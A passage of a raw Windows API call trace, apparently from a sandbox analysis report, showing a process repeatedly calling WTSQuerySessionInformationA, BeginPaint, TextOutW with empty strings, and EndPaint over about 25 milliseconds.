lpPaint=0x18a5ac) returned 0 [0037.567] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.567] WTSFreeMemory (pMemory=0x0) [0037.567] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.567] TextOutW (hdc=0x0, x=3663, y=4250, lpString="", c=0) returned 1 [0037.567] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.567] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.568] WTSFreeMemory (pMemory=0x0) [0037.568] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.568] TextOutW (hdc=0x0, x=3673, y=4275, lpString="", c=0) returned 1 [0037.568] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.568] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.568] WTSFreeMemory (pMemory=0x0) [0037.568] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.568] TextOutW (hdc=0x0, x=3683, y=4300, lpString="", c=0) returned 1 [0037.568] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.568] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.569] WTSFreeMemory (pMemory=0x0) [0037.569] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.569] TextOutW (hdc=0x0, x=3693, y=4325, lpString="", c=0) returned 1 [0037.569] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.569] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.569] WTSFreeMemory (pMemory=0x0) [0037.569] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.569] TextOutW (hdc=0x0, x=3703, y=4350, lpString="", c=0) returned 1 [0037.569] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.569] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.569] WTSFreeMemory (pMemory=0x0) [0037.570] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.570] TextOutW (hdc=0x0, x=3713, y=4375, lpString="", c=0) returned 1 [0037.570] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.570] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.570] WTSFreeMemory (pMemory=0x0) [0037.570] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.570] TextOutW (hdc=0x0, x=3723, y=4400, lpString="", c=0) returned 1 [0037.570] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.570] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.570] WTSFreeMemory (pMemory=0x0) [0037.570] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.570] TextOutW (hdc=0x0, x=3733, y=4425, lpString="", c=0) returned 1 [0037.570] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.570] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.571] WTSFreeMemory (pMemory=0x0) [0037.571] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.571] TextOutW (hdc=0x0, x=3743, y=4450, lpString="", c=0) returned 1 [0037.571] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.571] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.571] WTSFreeMemory (pMemory=0x0) [0037.571] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.571] TextOutW (hdc=0x0, x=3753, y=4475, lpString="", c=0) returned 1 [0037.571] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.572] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.572] WTSFreeMemory (pMemory=0x0) [0037.572] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.572] TextOutW (hdc=0x0, x=3763, y=4500, lpString="", c=0) returned 1 [0037.572] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.572] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.572] WTSFreeMemory (pMemory=0x0) [0037.572] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.572] TextOutW (hdc=0x0, x=3773, y=4525, lpString="", c=0) returned 1 [0037.572] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.572] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.573] WTSFreeMemory (pMemory=0x0) [0037.573] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.573] TextOutW (hdc=0x0, x=3783, y=4550, lpString="", c=0) returned 1 [0037.573] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.573] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.573] WTSFreeMemory (pMemory=0x0) [0037.573] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.573] TextOutW (hdc=0x0, x=3793, y=4575, lpString="", c=0) returned 1 [0037.573] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.573] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.574] WTSFreeMemory (pMemory=0x0) [0037.574] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.574] TextOutW (hdc=0x0, x=3803, y=4600, lpString="", c=0) returned 1 [0037.574] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.574] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.574] WTSFreeMemory (pMemory=0x0) [0037.574] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.574] TextOutW (hdc=0x0, x=3813, y=4625, lpString="", c=0) returned 1 [0037.574] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.574] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.574] WTSFreeMemory (pMemory=0x0) [0037.575] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.575] TextOutW (hdc=0x0, x=3823, y=4650, lpString="", c=0) returned 1 [0037.575] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.575] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.575] WTSFreeMemory (pMemory=0x0) [0037.575] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.575] TextOutW (hdc=0x0, x=3833, y=4675, lpString="", c=0) returned 1 [0037.575] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.575] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.575] WTSFreeMemory (pMemory=0x0) [0037.576] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.576] TextOutW (hdc=0x0, x=3843, y=4700, lpString="", c=0) returned 1 [0037.576] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.576] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.576] WTSFreeMemory (pMemory=0x0) [0037.576] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.576] TextOutW (hdc=0x0, x=3853, y=4725, lpString="", c=0) returned 1 [0037.576] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.576] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.576] WTSFreeMemory (pMemory=0x0) [0037.577] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.577] TextOutW (hdc=0x0, x=3863, y=4750, lpString="", c=0) returned 1 [0037.577] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.577] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.577] WTSFreeMemory (pMemory=0x0) [0037.577] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.577] TextOutW (hdc=0x0, x=3873, y=4775, lpString="", c=0) returned 1 [0037.577] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.577] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.577] WTSFreeMemory (pMemory=0x0) [0037.577] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.577] TextOutW (hdc=0x0, x=3883, y=4800, lpString="", c=0) returned 1 [0037.577] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.578] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.578] WTSFreeMemory (pMemory=0x0) [0037.578] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.578] TextOutW (hdc=0x0, x=3893, y=4825, lpString="", c=0) returned 1 [0037.578] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.578] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.578] WTSFreeMemory (pMemory=0x0) [0037.578] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.578] TextOutW (hdc=0x0, x=3903, y=4850, lpString="", c=0) returned 1 [0037.578] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.578] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.579] WTSFreeMemory (pMemory=0x0) [0037.579] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.579] TextOutW (hdc=0x0, x=3913, y=4875, lpString="", c=0) returned 1 [0037.579] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.579] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.579] WTSFreeMemory (pMemory=0x0) [0037.579] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.579] TextOutW (hdc=0x0, x=3923, y=4900, lpString="", c=0) returned 1 [0037.579] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.579] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.580] WTSFreeMemory (pMemory=0x0) [0037.580] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.580] TextOutW (hdc=0x0, x=3933, y=4925, lpString="", c=0) returned 1 [0037.580] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.580] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.580] WTSFreeMemory (pMemory=0x0) [0037.580] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.580] TextOutW (hdc=0x0, x=3943, y=4950, lpString="", c=0) returned 1 [0037.580] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.580] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.581] WTSFreeMemory (pMemory=0x0) [0037.581] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.581] TextOutW (hdc=0x0, x=3953, y=4975, lpString="", c=0) returned 1 [0037.581] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.581] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.581] WTSFreeMemory (pMemory=0x0) [0037.581] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.581] TextOutW (hdc=0x0, x=3963, y=5000, lpString="", c=0) returned 1 [0037.581] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.581] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.581] WTSFreeMemory (pMemory=0x0) [0037.582] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.582] TextOutW (hdc=0x0, x=3973, y=5025, lpString="", c=0) returned 1 [0037.582] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.582] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.582] WTSFreeMemory (pMemory=0x0) [0037.582] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.582] TextOutW (hdc=0x0, x=3983, y=5050, lpString="", c=0) returned 1 [0037.582] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.582] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.582] WTSFreeMemory (pMemory=0x0) [0037.583] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.583] TextOutW (hdc=0x0, x=3993, y=5075, lpString="", c=0) returned 1 [0037.583] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.583] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.583] WTSFreeMemory (pMemory=0x0) [0037.583] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.583] TextOutW (hdc=0x0, x=4003, y=5100, lpString="", c=0) returned 1 [0037.583] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.583] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.583] WTSFreeMemory (pMemory=0x0) [0037.583] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.583] TextOutW (hdc=0x0, x=4013, y=5125, lpString="", c=0) returned 1 [0037.583] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.584] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.584] WTSFreeMemory (pMemory=0x0) [0037.584] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.584] TextOutW (hdc=0x0, x=4023, y=5150, lpString="", c=0) returned 1 [0037.584] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.584] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.584] WTSFreeMemory (pMemory=0x0) [0037.584] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.584] TextOutW (hdc=0x0, x=4033, y=5175, lpString="", c=0) returned 1 [0037.584] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.584] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.585] WTSFreeMemory (pMemory=0x0) [0037.585] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.585] TextOutW (hdc=0x0, x=4043, y=5200, lpString="", c=0) returned 1 [0037.585] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.585] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.585] WTSFreeMemory (pMemory=0x0) [0037.585] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.585] TextOutW (hdc=0x0, x=4053, y=5225, lpString="", c=0) returned 1 [0037.585] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.585] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.586] WTSFreeMemory (pMemory=0x0) [0037.586] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.586] TextOutW (hdc=0x0, x=4063, y=5250, lpString="", c=0) returned 1 [0037.586] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.586] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.586] WTSFreeMemory (pMemory=0x0) [0037.586] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.586] TextOutW (hdc=0x0, x=4073, y=5275, lpString="", c=0) returned 1 [0037.586] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.586] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.586] WTSFreeMemory (pMemory=0x0) [0037.587] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.587] TextOutW (hdc=0x0, x=4083, y=5300, lpString="", c=0) returned 1 [0037.587] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.587] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.587] WTSFreeMemory (pMemory=0x0) [0037.587] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.587] TextOutW (hdc=0x0, x=4093, y=5325, lpString="", c=0) returned 1 [0037.587] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.587] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.587] WTSFreeMemory (pMemory=0x0) [0037.588] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.588] TextOutW (hdc=0x0, x=4103, y=5350, lpString="", c=0) returned 1 [0037.588] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.588] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.588] WTSFreeMemory (pMemory=0x0) [0037.588] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.588] TextOutW (hdc=0x0, x=4113, y=5375, lpString="", c=0) returned 1 [0037.588] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.588] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.588] WTSFreeMemory (pMemory=0x0) [0037.589] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.589] TextOutW (hdc=0x0, x=4123, y=5400, lpString="", c=0) returned 1 [0037.589] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.589] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.589] WTSFreeMemory (pMemory=0x0) [0037.589] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.589] TextOutW (hdc=0x0, x=4133, y=5425, lpString="", c=0) returned 1 [0037.589] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.589] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.589] WTSFreeMemory (pMemory=0x0) [0037.590] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.590] TextOutW (hdc=0x0, x=4143, y=5450, lpString="", c=0) returned 1 [0037.590] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.590] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.590] WTSFreeMemory (pMemory=0x0) [0037.590] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.590] TextOutW (hdc=0x0, x=4153, y=5475, lpString="", c=0) returned 1 [0037.590] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.590] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.590] WTSFreeMemory (pMemory=0x0) [0037.591] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.591] TextOutW (hdc=0x0, x=4163, y=5500, lpString="", c=0) returned 1 [0037.591] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.591] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.591] WTSFreeMemory 